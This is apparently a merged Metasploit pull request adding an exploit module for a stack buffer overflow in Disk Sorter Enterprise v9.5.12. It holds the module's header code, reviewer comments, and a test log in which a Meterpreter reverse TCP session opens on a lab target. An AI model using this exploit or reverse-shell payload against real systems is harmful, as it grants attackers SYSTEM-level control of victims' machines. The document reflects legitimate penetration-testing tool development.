### PR TITLE
Buffer Overflow on Disk Sorter Enterprise

### PR DESCRIPTION
**Pull request by DanielRTeixeira**
The software is available at: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
Video: https://youtu.be/ot9UASdRY1w

### CODE REVIEW

**Comment by h00die** [comment]
Can you please add docs

File: modules/exploits/windows/http/disksorter_bof.rb [hunk 1]
```diff
@@ -0,0 +1,104 @@
...
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Sorter Enterprise GET Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in the web interface of Disk Sorter Enterprise v9.5.12,caused by
```
Comment (h00die) [inline modules/exploits/windows/http/disksorter_bof.rb]: space after `,`

**Comment by DanielRTeixeira** [comment]
Done, let me know if you need anything else.

**Comment by h00die** [comment]
docs are .md not .rb.md

you should be able to `use` your module, then do `info -d` and view it in a browser to know you did it correctly

**Comment by wchen-r7** [comment]
I will test this PR. Thanks!

**Comment by wchen-r7** [comment]
The exploit works for me:

```
msf exploit(disksorter_bof) > show options

Module options (exploit/windows/http/disksorter_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.146.173  yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.146.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Sorter Enterprise v9.5.12


msf exploit(disksorter_bof) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Sending request...
[*] Sending stage (957487 bytes) to 192.168.146.173
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.173:1051) at 2017-04-24 17:15:39 -0500
```

Also the doc is easy to follow. Great job!

**Comment by wchen-r7** [comment]
# Release Notes

This module exploits a buffer overflow vulnerability in Disk Sorter Enterprise. By sending a specially crafted string in an HTTP GET request, the attacker could grain arbitrary remote code execution under the context of SYSTEM.

**Pull request merged**